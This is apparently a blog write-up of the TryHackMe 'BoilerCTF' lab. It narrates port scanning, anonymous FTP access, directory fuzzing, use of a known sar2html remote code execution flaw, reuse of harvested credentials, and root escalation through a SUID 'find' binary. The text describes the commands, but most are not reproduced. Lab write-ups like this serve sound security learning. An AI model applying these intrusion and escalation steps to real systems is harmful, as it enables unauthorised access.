Tue. Oct 20th, 2020

Pentesting Fun Stuff

following the cyber security path…

BoilerCTF

Another room from TryHackMe and it’s rated as intermediate. Let’s start by running a port scan.

Enumeration

Host down…..Let’s see if I can ping the machine.

Yes I can. For those who wonder why I ping boilerctf.thm…….this is because I get an hour for a room at TryHackMe. If I run out of time or restart the room I get another IP address to attack. When I add the current IP address to /etc/hosts I can use the domain name instead of remember the IP address with every change.

But because I can ping the machine, I run the port scan again, but this time I add the option -Pn, which tells nmap to skip host discovery and treat all hosts as online.

With this option active I get a better result from nmap. The following ports are open:

  • 21 | FTP (vsftpd version 3.0.3)
  • 80 | HTTP (Apache version 2.4.18 for Ubuntu)
  • 10000 | HTTP (MiniServ version 1.930)
  • 55007 | SSH (OpenSSH version 7.2p2)

FTP

From the nmap scan I can see that anonymous login is enabled on this FTP server. So let’s see if there is something useful to be found.

There is a file with the extension txt. If I only used the command ls or dir, I wouldn’t have found anything, because the file is marked as hidden (there is a dot in front of its filename). Also I used the -p option to activate passive ftp. This way the client (me) is making all the requests and is initiating the connections instead of active FTP where the server tries to sent data via port 20.

I downloaded the file. Now to see what’s in it.

My first guess is some kind of rotation. It looks like there are some dots to end the sentence, a colon and a exclamation mark. There is a nifty site where you can try to use a frequency analysis attack on this sequence, which is called CyberChef.

My first guess was correct, because when I choose ROT13 I get a readable string: Just wanted to see if you find it. Lol. Remember: Enumeration is the key!

No real info, so on to the next service.

Webserver

When directing my browser to the site I get a default Apache page. From the nmap scan I know there is a robots.txt file.

And this is why I like CTF based challenges. Is this a rabbit hole or a puzzle that needs to be solved. While wrapping my head around this string, I run a webfuzzer in the background. There are many tools for this like Gobuster, Dirb, Dirbuster and many more. I like DirSearch a lot. This tool doesn’t come by default with Kali and if you want to give it a try, you can find it on github.

With this tool I used certain flags to help get a better result. The -u flag is a mandatory one as it defines the URL it needs to scan. The -e flag is for which extension to scan. This flag is also a mandatory one and it needs at least one extension. You can add more extensions by concatenating them with a comma. The -f flag is for forcing the used extensions with the chosen wordlist (the same as can be done with Dirbuster) and the -x flag, which is used to filter out HTTP response codes (400 being page not found and 403 being page is restricted – more on these codes can be found with Google). There is another flag which is very useful and that is the -w flag. This flag lets you choose the preferred wordlist. For more options you can always use the -h flag.

I can use the -r flag, which lets DirSearch do a recursive scan (which I don’t prefer), but instead I run another aimed scan on the /joomla/ folder.

The first 2 hits are a bit off. When curling them I get some base64 encoded text.

To decode base64 you can use some online tools or use the tools available on Kali.

More base64. One more time by hand and if there is more, I’ll try a loop.

Guess this was it. But it looks like another rabbit hole. The other folder which seemed a bit off was the folder /_test/. When directing my browser to that folder I get an interesting response. On this page runs software called sar2html. Sar2html is a Web-based front end for performance monitoring. It converts sar binary data to graphical format. The last update was performed in 2013. When looking at the offline version of exploit database I can see there is a remote code execution (RCE) vulnerability.

That’s not that hard to test.

This exploit seems to work.

With the command cat I can read the file called log.txt

 

Looks like credentials. I know from the nmap scan that an SSH server is running on port 55007.

Some basic enumeration starts in the home folder of the compromised user and that’s where I find another set of credentials.

Changing user.

Does this user have sudo rights?

And another red haring. Back to his root folder.

Let’s see what is listening.

Looks like a mySQL server is running locally. But when I try to gain access it denies every try. No go here. From earlier enumeration I saw my current user has LXD rights. This could be a way to escalate your privileges, but in this case it looks like a rabbit hole.

Escalation of Privilege

One of the things you need to look at during system enumeration is files with the SUID bit set. What is the SUID bit?

SUID (Set owner User ID up on execution) is a special type of file permissions given to a file. Normally in Linux/Unix when a program runs, it inherits access permissions from the logged in user. SUID is defined as giving temporary permissions to a user to run a program/file with the permissions of the file owner rather that the user who runs it.

To find files with the SUID bit set, you can run the following command:

With this command I used the find command to search for files recursively from the root folder and so on. Next I used the -perm flag to filter on a specific permission setting. In this case /4000 which is the numerical representation of the SUID bit enabled. Because I only want files, I used the -type f flag and the last flag I used is -exec, which let’s me execute a command with the findings from find in an array. In this case I used ls -ld to show the owner of the found files and the date of creation (which always is a good indicator which file was tempered with or created for the purpose of the challenge. Finally I ended with 2>/dev/null, which redirects all stderr (errors) to /dev/null and destroys them instead of showing them on screen and polluting my results.

In the list of files there is an interesting on, namely the command find itself. The command find has, like I showed above, an -exec flag where you can execute commands. Because the command has the SUID of root set, I can execute commands as root. Let’s test this.

In this example I created a file through the exec flag of find and it created a file with as owner root and group stoner. I can do several things with this, but as I want access to the /root folder, I’m going to give myself better access.

Here I changed the folder /root to rwxrwxrwx (777) so everyone can open the files and folders in it.

Another way of getting access to folder /root is by adding yourself to the sudo group and then escalating to root.

One thing to remember is that I loaded my bash shell again by executing the command su stoner after I was added to the sudo group. Without this step it wouldn’t work as the environment of the current bash shell wasn’t loaded properly. After that I used sudo to jump to user root and because I had sudo rights to act as root, there were no restrictions to stop me.

And there you have it. A really fun CTF based challenge to test your skills and learn some new things.

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.